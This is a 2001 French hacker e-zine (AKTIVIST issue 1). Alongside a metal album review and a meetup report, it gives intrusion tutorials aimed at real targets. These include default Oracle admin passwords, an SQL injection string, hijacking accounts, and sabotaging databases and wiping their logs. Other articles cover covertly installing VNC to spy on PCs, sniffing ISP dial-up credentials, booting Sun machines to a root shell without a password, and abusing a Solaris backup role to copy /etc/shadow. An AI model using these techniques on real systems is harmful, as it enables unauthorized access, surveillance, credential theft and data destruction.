Salut  toi, toi qui vient lire ce first issue d'un mag particulier.Pourquoi   perdre du temps en prsentation maintenant? Autant allez  l'essentiel tout de suite. Si tu trouve les articles intressants tu aura les greetz du staff en fin   de page. Ce mag tente de rendre hommage aux pionniers de la scne franaise, comme Core-Dump et N0way.
    
                             NeurAlien: tu etais un exemple pour nous tous.
                                      Bonne lecture terrien.



Cet oeuvre comporte les Philes suivants:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.1: Introduction  Oracle          xNeur0x   6.5 Ko
1.2: Pc Anywhere et VNC             xNeur0x   3.1 Ko
1.3: Meet 2600                      xNeur0x   4.0 Ko
1.4: Hack FAI gratuit avec windump  Rys       3.2 Ko
1.5: Open Boot Prom  (prsentation) xNeur0x   1.7 Ko
1.6: Children Of Bodom              xNeur0x   3.5 Ko 
1.7: Tarback (lisez le c bien!)     xNeur0x   5.4 Ko
1.8: Blah-Blah    

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1  Phile 1/8 [xNeur0x] 23/02/01                               = 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



                                       ORACLE


                                       par xNeur0x

    
Intr0dution
===========
  Et bien voil, j'attaque les premires lignes de mon article,  minuit et 27
minutes en attendant une jeune femme qui risque bien de ne pas venir... "soupir"
Commenons par un tat des lieux. On est en 2001, le monde est connect  la toile de rseaux appele "internet".Les sites de ventes en lignes pullulent sur le web, Les pubs ddis  la tlvision aussi ... Oracle n3 des gants informatiques tire son pingle avec ses bases de donnes les plus mieux bien de la plante. Pour l'histoire, sachez que Larry Elisson, le CEO d'Oracle est le seul homme d'affaire  avoir fait des bnefices cette anne.Avec le plongeon de l'indice du Nasdaq, mme Steve Ballmer (n1 de Microsoft)  perdu des sous-sous cette anne, le pauvre ;-)

  Je vais vous donnez ici tout ce qu'il faut savoir pour une premire approche 
sur Oracle, de faon  attaquer sans complexe la moindre base de donnes qui vous tombera sous la main. Vu la popularit de l'editeur, vous tes sur de tomber sur une base Oracle. ( 70%). Le reste c'est du pipi de chat niveau fonctionnalit, ou des "sous-bases" style M$ Access, donc on en parle mme pas. J'ai fait ce phile car j'ai trouv trs peu d'article relatif au sujet sur le net.Le seul article potable est paru dans Pirate' mag n2, on croit rver ... Bref, si a vous intresse, je continuerais dans cette voie. Ce premier article s'adresse plutot aux dbutants, avec quelques notions d'SQL.

L'actu d'Oracle
===============
  Oracle propose actuellement la dernire version de sa base de donnes: Oracle 
9i. C'est un package logiciel comprenant une base bien sur, mais aussi tout un tas d'utilitaires d'administration (dont nous verrons les failles), des outils pour le web, le e-commerce, ect ...

Les bases les plus rpandu sont les Oracle 8i (8.1.5 et 8.1.6) fonctionnant sur presque toute les plateformes (Unix x86, Sparc, HP-UX, NT, etc ...)
On s'interressera aux failles des bases en elle-mme, et dans un prochain numro des outils d'admin  distance,on verra aussi un type d'architecture assez utilis sur le web et pas du tout protg: le forms 3/3 

Les "grosses" failles d'Oracle
==============================
  On commence par un classique: Les users et les passwd. Il faut savoir que chez 
Oracle, la tradition est de rigueur depuis les annes80. Vous pouvez installer n'importe quel base, jusqu' la dernire version, vous aurez toujours les mmes schmas installs par dfaut. Voici donc dans 90% des cas les users et passwd d'administrations que bien peu de DBA (Ndr: c'est le nom de l'administrateur de base de donnes) changent dans leur courte vie.

Username/Pass:

SYS/manager
SYS/change_on_install
SYSTEM/manager

Voici egalement un utilisateur qui existe bien souvent, car son schma est cre "en exemple" lors de l'installation de la base:

SCOTT/tiger

Nb: un schma reprsente un utilisateur + des objets: tables, triggers, ect ...

WOrking in progress
===================
C'est bien beau mais comment faire pour pntrer la base? Voici le fonctionnement universel d'Oracle:
Chaque base possde un nom, un alias et un SID. En gros c'est la mme chose, mais  des niveaux diffrents. Le SID represente la base au niveau physique: c'est le nom du rpertoire sur le disque dur. Pour un SID vous pouvez avoir n alias.


la base est en ecoute sur les ports 1526 et 1521 en TCP/IP grace  un module spcifique appel LISTENER. d'autres protocoles sont dispo mais rarement utiliss.Pour vous connectez, il suffit d'utiliser telnet sur ces ports, ou mieux l'utilitaire de connexion en ligne de commande d'Oracle: SQL+ (des clones sont dispo en Free un peu partout)
Pour pas tout vous tapez  la main, rechercher les logiciels suivant: Golden32 de Benthic Software et T.O.A.D de Quest software (dispo galement en download  sur le net). L'avantage de TOAD par exemple, c'est de loader d'un seul coup tout le schma d'un utilisateur. Ainsi, grace  l'option "Schma browser" on parcours les tables comme les rpertoires d'un systme avec un explorateur.

Une chaine de connexion est de ce type:  <user>/<passwd>@<nom_de_la_base>

exemple:

SQL>connect sys/manager@hlise

Nb: par defaut le SID des bases s'appelle ORCL. Et bien souvent nom_base = orcl ou oracle... h h.
Pensez  votre fichier hosts pour par avoir  taper une IP  chaque fois. Si vous tapez dans une base suprieure  la version 7, vous tes sur que TCP/IP est utilis. Donc c'est bien pratique, on peut utiliser toutes les failles connu d' ipv4.

Comment s'effectue une recherche?
Pour des formulaires simple, style via le web:

SELECT <col1>,<col2>,<colx>
FROM <table1>,<table2>,<tablex>
WHERE <colx> LIKE "%<attribut>%";

La faille vient du LIKE. En effet  l'intrieur des " " On peut mettre une autre commande SQL !

Quand dans votre formulaire sur le web vous avez un champ de requete, c'est l'<attribut> que l'on attend, ainsi, essayer d'entrer directement des commandes SQL entre " "

Exemple:

"; DESC USER_CATALOG"

Qu'est-ce que a fait:

SELECT <col1>,<col2>,<colx>
FROM <table1>,<table2>,<tablex>
WHERE <colx> LIKE "%";
DESC USER_CATALOG
;

au lieu de faire votre selection, la base vous affiche toutes les tables de l'utilisateur! sympa hein?
Bon ce style d'accs est vraiment pas propre, faut tatonner, essayer des kilos de commandes avant d'avoir quelquechose d'utilisable. Le mieux est encore de se connecter directement  la base, via SQL+


And N0w ?
===============
  Admettons que vous tes connect en sys sur une base d'un site quelconque. 
essayez les commandes suivantes:

SQL> desc user$
  cette commande vous donnera la liste des utilisateurs de la base ainsi que les 
pass, mais pas de bol: crypts.
On s'interressera au dcryptage brute une autre fois. Disons que les donnes d'un utilisateurs particulier vous intresse, appelons le user1. Si vous tes sans piti, il vous suffit de changer son mot de passe, puis de vous 
connecter  sa place:

SQL> grant connect,resource to user1 identified by toto;
  Maintenant il suffit de vous connecter avec ce mot de passe:

SQL> connect user1/toto@hlise
  Si vous avez un semblant de connaissance SQL, alors les possibilites sont 
infinies! En fait, acceder  une base de donnes peut se rveler trs utile pour trouver tout un tas d'info sur les users. Souvent mme, ils stockent leurs password dans la base! C'est une source inpuisable pour faire du SE.

Nb: rappel de quelques mots cls:
select, update, delete (selection, creation/modif, effacement)
where, count, order by ... (filtres)

Crash Override
==============
  Les fichiers relatifs  la base se trouve dans <ORACLE_HOME>/admin/
si vous endommagez ou supprimez le fichier system01.dbf ... bye bye la base !
Si vous voulez pourrir plus "gentiement" les utilisateurs (et administrateurs) de la base, vous pouvez cibler les donnes bien sur, mais aussi les files de fonctionnement de la base.Dans le rpertoire <ORACLE_HOME>/admin/pfile se trouve le fichier init.ora  
C'est le fichier de dmarrage de la base. La plupart des paramtres sont 
facilement comprhensible. Un fichier d'exemple est fournit avec ce zip merveilleux d'o vous lisez ce phile. Tout d'abord si vous tomber sur ce fichier en parcourant les rpertoire d'un serveur, vous saurez immediatement le nom de la base. C'est crit en clair. Et init.ora est en gnral full granted access ...
Amusez vous  changer les valeurs de open_cursors par exemple. si ce paramtre est gal  0, plus personne ne pourra creer de nouvel enregistrement dans la base ! Bref, y'a de quoi faire chier le monde avec a, mais vous tes libre de rien casser bien sur ...

Pour finir: Effectivement, toutes les transactions sont logus dans les fichiers REDO0.LOG, REDO1.LOG, ect ... Cependant, la plupart des DBA ne s'en occupent jamais ! ils sont tellement volumineux et insondables que bien souvent ils sont crass toutes les semaines. Ils sont utiles que pour redescendre une sauvegarde. Donc si vous tes top-parano, ben videz-les. (ATTENTION! ne les effacez pas!!, faites un touch c mieux!, sinon la base s'arrete.)

C0ncluzion
==========

Les bases de donnes pulullent partout, dans toutes les entreprises,derrires les sites de commerces en lignes,
dans tes chiottes, les cheveux de ta soeur ...
Anyway, c'est tout simple  trouver et tout simple  cracker. Enj0Y !  Neur0X

PS: atttention: on a pas dit que c'etait bien d'aller voir les Bases. Surtout celles des banques hein? C'est pas une raison pour combler votre dcouvert!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1  Phile 2/8 [xNeur0x] 23/02/01                               =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                                       PC anywhere / VNC
                                
                                
                                       par xNeur0x
                                
                                
                                
  1h13 du mat... Ma belle m'as laiss. Je garde espoir? allez dites: "OUI GARDE
ESPOIR!". Que diable l'amour et les folies sexuelles! Laissons nous allez dans notre obscure passion. 

[xNeur0x is away]

11h30 le lendemain: Bon finalement elle est venu et c'etait comment dire ... Merveilleux, magique ?
Bref, j'ai laiss l'article en plan, mais je reviens:
Alors Pc Anywhere de Symantec et VNC sont des logiciels de controle  distance de pc sous windows. 
En gros vous voyez et agissez sur l'ecran de la cible comme si vous y tiez.
Pc anywhere est trs utilis partout dans le monde. Il est utilis par les socits de services informatique pour la maintenance de leur client. Le hic c'est que bien souvent, pour simplifier les choses ils ne mettent pas de mot de passe ni mme de compte pour se connecter. L'entreprise cliente branche son modem, lance Pc anywhere en mode attente de connexion. Ensuite de l'autre cot, le Pc anywhere "serveur" appel le modem et la connexion s'etablie. A ce moment prcis, le serveur "prend la main" sur le poste cible. C'est assez marrant: la souris se dplace toute seule, ect ...

Avec un peu de S.E vous devez pouvoir mettre en attente de connexion une PME sans pb. Vous trouverez PC
anywhere un peu partout sur le net. Prtendez tre la socit de maintenance du parc par exemple, et le tour est jou. A noter aussi: certaines socits laisse leur modem en attente de connexion en permanence... Enjoy !!

Vnc lui est  mon avis, beaucoup moins utilis, mais par contre dans un autre usage il vous sera bien utile. Contrairement  Pc Anywhere, il se dcompose en 2 logiciel: le serveur, qui permet de rendre un pc "joiniable" et le viewer, un tout petit excutable de ... 172Ko ! Le GROS avantage de VNC c'est: il est Open source, le viewer et le client se trouve sur bcp de Plateforme dont Linux.

Le principe est le suivant: Dbrouillez vous pour installer le serveur sur un maximum de pc. Une option permet de rendre le serveur "presque" invisible, en tout cas invisble pour la plupart des socits. Ensuite amusez vous de n'importe o  prendre le contrle des PC  distance! C'est puissant d'avoir accs  tout: mail, documents personnels, ... On apprend en gnral beaucoup de chose sur les gens! Vous allez me dire: ben oui, c'est un trojan quoi! Et bien sur le principe oui sauf que VNC ne sera JAMAIS limin par un antivirus ! (idem pour PCAnywhere). 

C tout bande de voyeur!  venir: un tutorial complet pour modifier le serveur VNC en trojan. Vous avez un article intressant sur VNC/Linux dans le dernier numero de LOGIN: (fv/mars). Le viewer est livr dans le zip.

Neur0X

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1  Phile 3/8 [xNeur0x] 07/03/01                               =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                                       meet 2600
                                
                                
                                       par xNeur0x
                                       



    aah Paris... C'est une ville bien particulire. La nuit les vieux batiments
 s'illuminent et donnent  la ville un aspect magique, un peu comme dans la vieille srie Belphgor. Mais ce qui m'as ammen dans la capitale ce vendredi 2 mars 2001 c'est le meeting 2600, place d'Italie, dans le XIIIeme arondissement. Conseil pour les futurs meeterz: ne venez pas AVANT 18H30 ! Sinon vous tes condamn  poireauter 1H dans le froid devant le grand cinma. A noter aussi que le Mc do-RDV se trouve EN BAS et non en haut,  l'intrieur du cinma. Voil c'est dit. Vous retrouver les infos sur le site du 2600 france: http://www.2600.fr.st. De toute faon c'est tout les premier vendredi du mois.
 
 Pour mon premier meet j'ai eu beaucoup de chance. En effet, d'aprs les aventures de certains, il y a parfois un cruel manque de personne  ces meetings. Cette fois-ci on tait une trentaine. Les gars d'Epsylon, Bite rouge, la scne parisienne quoi, mais j'ai eu la chance de rencontrer Syntax_Error, AgentHunt et Paran0id, des gars trs bien, avec qui on peut discuter des heures et des heures. Syntax est un cracker plutot super fort. Il fait partit d'Eclipse, un groupe que beaucoup doivent connaitre. Spcialis dans les Key-generator, il m'a parl de la scne crack, bien diffrente de la scne Hack. Notamment la hierarchisation (scusez l'orthographe) des groupes. Entre cracker, supplyer, Leader... Mais surtout entre groupe: interdiction formelle de faire un key-gen d'un soft existant! tout est maintenu par la communaut. C'est assez surprenant. J'espere que Syntax pourra me faire un petit article pour Aktivist d'ici peu. Quand  Paranoid d'RTC, on a sympathis et discuter pendant de longue heures sur la scne en gnral, sur les groupes en France et surtout de nostalgie, nostalgie de toute une epoque. Quand la mdiatisation n'avait pas encore frappe . En rsum disons que les "grands" groupes franais on disparu. Cryptel, Tipiak, Madchat et Epsylon... En fait seul RTC est actif, j'espere que nous le serons aussi. Cet emag marque le dbut d'une aventure qui se prsente bien. On espre qu'Aktivist et RTC seront mains dans la mains pour organiser des meet un peu plus consquent en France. 
 
 Le principe du meet 2600 est une bonne chose, car on rencontre toujours des gens avec qui on peut partager toute sorte de choses, mais pour ceux qui recherche vraiment de l'info technique, passez votre chemin. Il n'y a pas de rel thme abord au cour d'un meet, mais c'est en discutant qu'on apprend. Ce qui  fait la force des hackers dans les annes 80, c'est le partage de connaissances "en live". Tout ceux qui sont allez  des Hack-party vous le diront: on apprend plus en 3 jours de workshop  un gros meet qu'en un an de bidouillage isol. Le but de cet article est de faire prendre conscience de cet tat de fait  vous, lecteur. L'IRC est, avouons le, bien peu reluisant niveau partage de connaissance. C'est un peu la gu-guerre continuelle entre les gens sur les chans. On a peur de dire ce qu'on sait pas sous peine de se faire traiter de tous les noms, et faut dire aussi que l'orgeuil en prend un coup. Curieusement, en RL (Real Life) les gens osent parler, discuter de ce qu'il connaisse et de ce qu'il connaisse pas. C'est aussi plus simple de parler sans crainte, sans utiliser son clavier, comme quoi la communication IRL n'est pas morte! J'invite tout le monde  venir en aout prochain  la HAL2001 en Hollande. Je compte bien y aller, alors si a vous intresse, contactez moi.
 D'ici l, pensez  venir faire un tour au 2600  Paris, et parler !
 Rendez-vous le mois prochain. 2600 rulez. 
 
 Neur0xxx (Arf, a fait Redoxx ... NOOOOON!)
 
 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 =AKTIVIST Issue 1  Phile 4/8 [Rys] ??/03/01                                   =
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
 
                                       Hack des FAI gratuit avec Windump
                                 
                                 
                                       par Rys
                                       
                                       
Cet article est paru dans le dernier numro du 2600 magazine. Je vais essayer de faire une traduction approximative mais juste de cet article que j'ai trouv plutot intressant. J'espere qu'on aura un jour un 2600 en franais, mais bon faut pas rver non plus. Ceci dit, tout les articles ne sont pas toujours intressant. Surtout ceux qui traitent des spcificits des rseaux Telco US. 
Mais rentrons dans le VIF du sujet:

Windump est un logiciel super sympa. J'entend par super sympa:

- puissant: bcp d'options disponible
- simple d'emploi
- pas gros: quelques centaines de Ko
- Livrs avec les sources et les drivers !
- Bien document

Vous trouverez tout ce qu'il vous faut  l'adresse suivante:
http://netgroup-serv.polito.it/windump/

Recuperez l'executable qui convient  votre version de windows (95/98/2k)
ET le driver !
Suivez la belle procdure en ligne pour installer le driver en 4 secondes !
Si vous oublier le driver et lancer windump: BLUE SCREEN! ok?

Le sujet: Le probleme vient du codage "en dur" des passwords sur les cd-rom des FAI. Exemple; AOL, Free, Worldonline, ect... tout ceux qui utilise le protocole PAP ... Ceux qui utilise CHAP ... laisser tomber.

1) Installer le soft windump.
2) Installer le logiciel du FAI
3) Ouvrez une fentre DOS

tapez: C:\temp>windump -s 4096 -w packet.dmp

Lancer le client du FAI. faites comme si vous tiez un nouvel utilisateur, genre "oui! je vais tre un nouveau mongAOl !"
une fois sur la page d'acceuil, lancer windump.
allez jusqu' la confirmation de votre inscription,mais ne la faite pas! Puis arreter la capture par un <control-C>

On peut regarder le dump de differentes faons: Le plus simple, vous ouvrez l'archive avec un diteur de texte et vous parcourez les lignes... Vous tomberez avec un peu de bol sur la ligne contenant le login/password.

De faon plus "Pro" reportez vous  la RFC 1334 (PPP koi!)
Exemple chez Bluelight.com/Spinway:

Le protocol PAP correspond  c023. On a un paquet qui ressemble  a:

19:27:48:434708 20:53:45:4e:44:0
20:53:45:4e:44:0 c023 50:
0101 0024 1630 3034 626c 7265 6775 7365 
7240 6d70 7370 696e 7761 7908 346d 6c38
5859 4834

Bon le paquet est modifi, a marchera pas si vous vous logu avec a!
Pour voir a en Hexa, on peut faire comme on veut, peu importe. Une fois transform, on obtient a:

0101 0024 1630 3034 626c 7265 6775 7365 : $.004blreguse

7240 6d70 7370 696e 7761 7908 346d 6c38 : r@mpsinway.4ml8

traduction:

Username: 004blreguser@mpsinway
Pass: a commence par 4ml8 ... j'ai pas mis la suite !


Essayer vos valeurs en Dial-up sur le rseaux et tester le. Vous devrez vous connect sans pb, ensuite effacer le logiciel du FAI. Ensuite, mettez les valeurs dans PPPd et dgager Windows !

Enj00y! 

Rys

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1  Phile 5/8 [xNeur0x] 08/03/01                               =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                                       Open Boot PROM
                                
                                
                                       par xNeur0x
                                       
 
 
 Premire question: C'est quoi L'Open Boot Prom ? on dit OBP.
C'est comme le Bios d'un PC (en Schmatisant  mort) mais sur les Serveurs et stations SUN.
 
En gros a permet de grer le processus de boot et de dtecter les priphriques. Plus d'autres fonctions mais ne rentrons pas trop dans les dtails.
 
Ce qui est gnial, c'est que l'OBP est accessible  tout moment. Ainsi je vous donne la commande magique: STOP - A 
(un appui sur la touche STOP et la touche A simultanment) Bien sur via un clavier SUN qwerty. L'astuce c'est de balancer au noyau le code de ces 2 touches. C'est videment trs facile et je vous invite  essayer. Il vous suffit d'avoir un compte sous SunOS (n'importe quel version) et de balancer les codes des touches dans l'interpreteur de commande. (c'est plus simple en Bourne Shell qu'en C-shell mais bon)

vous verrez alors 2 trucs: soit rien (pas de bol) soir un joli prompt OK
 partir ce prompt essayer les commandes:

help (pour voir toutes les commandes)
probe-scsi-all (detection des pripheriques SCSI)
prone-ide-all (idem pour l'IDE)
printenv (toute les variables de l'OBP)
banner (un descriptif de la machine)

pour booter: 

boot -s : mode single user: PAS DE MOT DE PASSE ROOT !!
boot -v : en mode "verbeux"
boot -a : mode pas  pas
boot -d : mode diagnostique, en cas de pb

 bientot pour de nouvelles surprises avec l'OBP!

Neuro-X
 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1  Phile 6/8 [xNeur0x] 07/03/01                               =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                                       Children Of Bodom
                                
                                
                                       par xNeur0x
                                       


Je vais vous parler de zik maintenant, aprs s'tre bien pris la tte sur Oracle et VNC vous devez en avoir plein la tte et vous vous dites: "Il me faut un remontant musical ...". Trs bien: Children Of Bodom est l pour vous. Bon ceux qui n'apprecie pas ou peu le Metal et le Hardcore, c pas la peine d'aller plus loin. 

Depuis que ce groupe existe, c a dire depuis 2 ans, on assiste  une renaissance du metal. Marre du Hip hop commercial? des filles dvetue dans les clips de R&B ? Bref, la scne Hardcore et plus particulirement la scne SxE se donne  fond dans le mtal, qui toutefois c'est grandement acclerr niveau tempo. Prenez un groupe hardcore bien speed genre Arkangel, soupoudrez de Black Metal, on mlange le tout est on obtient: Children Of Bodom.
Children Of Bodom c'est au premier abord un come back dans les 80'. Solo de guitare, clavier, mlodie bien "metal". On se demande si la date inscrite sur la pochette du cd (08/2000) est bonne! Les metaleux qui ecoute sont supris par la prsence du clavier, mais a ne gache rien  l'ensemble au contraire. Le type est trs fort, et les habitus au Black ne seront en rien choqu par cette touche lectronique.

En fait c'est gnial. Techniquement, on repousse les limites de tout ce qui  t fait jusqu' maintenant. Tout les musiciens sont des x-heros. Le guitariste-chanteur tue tout, le batteur aussi. Je vous conseille le CD avec la pochette verte. La rouge est moins bien (plus vieux). Je sais pas comment c'est possible mais cette musique motive vraiment. exemple:

tu es sur la route avec ta voiture. il pleut, tu roule  50km/h, tu soupire, tu es mou.

[insertion du CD/ Play 1]
tu es sur la route avec ta voiture. il pleut, tu roule  120km/h, tu ferme les yeux.

[toujours le meme CD/ play 2]
tu n'es plus sur la route mais dans le foss, il pleut, tu roule  150km/h en travers, tu secoue la tete de haut en bas en hurlant des mots incomprhensible.

Pour les lyrics, c'est pas "engag"! a ressemble  du Black, style trs Hroic-Fantasy. Mais c'est sympa, y'a des refrains qu'on retient. C'est assez rare dans ce style musical. Si on ecoute COB c'est avant tout pour la musique, il faut bien le reconnaitre. Rien  voir avec la Scne Str8Edge, ou tout le monde regarde de prs les paroles. COB joue plus sur les ambiances et consacre son temps  la musique c clair!

Silent Night Bodom Night

On the eve of their death
They are baptized
In the unholy waters of bodom
With no hint of the torture awaiting
to greet them at the break of dawn

When the calm is setting in
we'll watch it swiffly disappear
Too many years of silence
soon he's bound to reappear

The Reaper
is calling for you to come home
With the thrust of a switchblade
on the grip of the madman
And the waters of Bodom
turn a blood shade of red
As the Children of Bodom
take their last breath.

Bon, clair c pas top recherch. Mais le guitariste/chanteur/compositeur du groupe n'a que ... 17ans ! ecoutez le et vous le detesterez tant il joue bien.

Cot distrib pas de soucis, vous trouverez a  la Fnac et un peu partout au rayon Metal ou Black Metal.

Neur0X_en_metal


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1  Phile 7/8 [xNeur0x] 08/03/01                               =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                                       Tarback
                                
                                
                                       par xNeur0x
                                       
                                       
Si vous ne devez lire qu'un article de ce zine, liseez celui-l. Pourquoi? parceque je pense que c'est de la newz de la vrai. Bon j'arrete. 

Connaissez vous les roles ? non ? arf ...
rappel: Sur beaucoup de systeme Unix, on utilise NIS.
NIS c'est bien pratique, mais pas du tout secure ! En effet c'est un vieux systeme et  l'epoque il n'y avait pas de fichier shadow ! donc par soucis de compatibilit on concatene le shadow dans le passwd ! (vive John the Ripper)

Autre gros avantages de NIS (pour nous en tous cas) comme les fichiers passwd sont centraliss sur un serveur du LAN, tout passe par le rezo! (vive snoop ou tcpdump)

Bref, tout le monde devrait installer NIS+, mais personne le fait car c trop compliqu!

rappel2: pour voir si vous tes en service NIS, tapez
%ypcat passwd
si vous avez kekchose c bon !

Mais bon, depuis le temps que NIS existe, "ils" ont trouv la parade : LES ROLES


RBAC(Role Based Access Control) donne une alternative au modle de scurit "tous les privilges ou aucun". Le problme avec le modle traditionel Unix n'est pas seulement que le root soit trs puissant mais que les autres utilisateurs n'aient pas suffisament de privilges pour rgler leurs propres problmes. RBAC permet d'assigner certains privilges d'administrateurs  des utilisateurs. (a sent bon tout a non ??)

Avec RBAC, vous pouvez donner la possiblit  de simples utilisateurs de rsoudre eux-mme leurs problmes en leurs assignant des packages correspondant aux privilges ncesaires. Les possiblits du root peuvent tre divises en plusieurs packages qui seront assigns sparment pour partager les responsablits d'administration.

En rsum: RBAC permet la sparation des pouvoirs, le controle de la dlgation des privilges aux autres utilisateurs et un degr variable de controle d'accs.

C4r4ct3ristiks:
===============

Autorisation: Permission utilise pour accorder l'accs  une fonction restreinte

Profil d'execution: (ou plus simplement Profil) Mcanisme interne regroupant les auttorisations et les commandes ayant des attributs spciaux, par exemple, les identits des groupes et des utilisateurs.

Role: Type spcial de compte utilisateur permettant l'xcution de taches administratives spcifiques.


CompoNEnts:
============
RBAC met en relation 4 bases de donnes pour fournir aux utilisateurs des accs privilgis:

user_attr: qui associe les users et les roles avec les autorisations et les profils

auth_attr: dfinie les autorisations

prof_attr: definie les profils

exec_attr: dfinie les oprations privilgies associes  un profil

Syntaxe:
========
chaque table  la meme syntaxe, c du grand classique:

le caractre : est le sparateur de champ
ex: nom:qualifieur:res1:res2:attribut

le caractre ; spare les paires cl-valeur dans les champs d'attributs
ex: type_attribut=valeur;profile_attribut=valeur;

le caractre , spare une liste ordonne dans une cl d'attribut spcifique, par exemple: ...;profile_attribut=profile_access1,profile_access2, ...

Acceder  un role:
==================

Pour assumer un role, servez vous de la commande su. Vous ne pouvez pas vous logguez avec un role.

% su monrole
Password:
#


Pour excutez les commandes du profil, tapez les simplements dans un shell, ex:

#lpadmin -p maprinter options

ici, la commande lpadmin est xcute avec les attributs du processus, UID et GID spciaux, qui ont t dfinis pour la commande lpadmin dans les profils assums par le rle.


Gestion des roles:
==================

roleadd: ajoute un role sur le systeme
useradd: ajoute un compte utilisateur au systeme

La commande roleadd:
options courantes:

-c commentaires
-d dir: le rep d'acceuil du nouveau role
-m cration du rep s'il existe pas
-A autorisation et -P profile

exemple: 
#roleadd -m -d /export/home/tarback -c "backup privilgi" -P\ "Backup and Restore" tarback

Cette commande cre un nouveau role appel tarback, dont on verra la subtilit tt  l'heure ... A noter que ce type de role est TRES souvent utilis.

Let's GOO!
==========

Bon, vous etes sur un systeme avec un utilisateur tout con, appelons le userb. 
regarder dans /etc/user_attr si vous avez une ligne du style:

userb::::type=normal;roles=datuser,tarback

le mot important est tarback, mais faite un grep avec le mot tar, c'est ce qui nous intresse ici.


$id
uid=102(userb) gid=1(other)

Donc, comme on le voit grace  id, on a pas grand chose comme droit

$more /etc/shadow
more: cannot open /etc/shadow

Ben zut alors ! bon, on se dcourage pas!

$tar cvf /tmp/shadowfile.backup /etc/shadow
tar: ./shadow: Permission denied

re-zut! Mais on se dcourage tjrs pas!
c'est l qu'intervient la magie:


$su tarback
Password: saisissez le mot de passe que vous connaissez pour userb

$cd /etc
$tar cvf /tmp/shadowfile.backup ./shadow
a: ./shadow 2K

$tar tvf /tmp/shadowfile.backup
tar: blocksize= 8
-r--------  0/3   411  Mar  06 22:08  ./shadow

$exit

on quitte le role tarback pour revenir en userb

$ls -l /tmp/shadowfile.backup 
-rw-r--r-- 1 userb other 2048 Mar 06 22:10

$cd
$pwd
/export/home/userb

$tar xvf /tmp/shadowfile.backup
tar: blocksize = 4
x ./shadow, 411 bytes, 1 tape blocks 

$cat shadow

c t'y pas bo ? et 1 shadow, 1 !

CONCLUSI0N:
c'est une bonne methode pour avoir un shadow, pensez aussi NIS, a marche dans bcp de cas ypcat passwd !!!
Dans un prochain Phile, on verra comment utiliser pour sois les roles: avoir tout les privileges, a tout moment, sans cracker le compte root!


xNeur0x


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=AKTIVIST Issue 1  Phile 8/8 [???] ??/03/01                                   =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Neur0x: Voil, le mag est termin. C'est un dbut. J'espre que vous avez aim.
        Moi je me suis bien (Ndr: pris la tte!) amus  le faire, j'espre qu'on aura du retour. pour les insultes, les commentaires, les critiques, ect...: 
        
        aktivistfr@online.fr
        
        En ce qui me concerne, ma VMB c'est la 122 (8 pour envoyer un message) au 0800 40 63 42 ... Sinon 
        
        xneurox@libertysurf.fr
        
        big greetz to: RTC(esp. Paran0D), Toute la team Aktivist.
        et aussi : RemX, xOlivix, K-ren, Malou, Syntax_Err0r, AgentHunt, Skoop, JoJo, Seld-on et Audrey: amour de ma vie.

                                    
                                
                                
                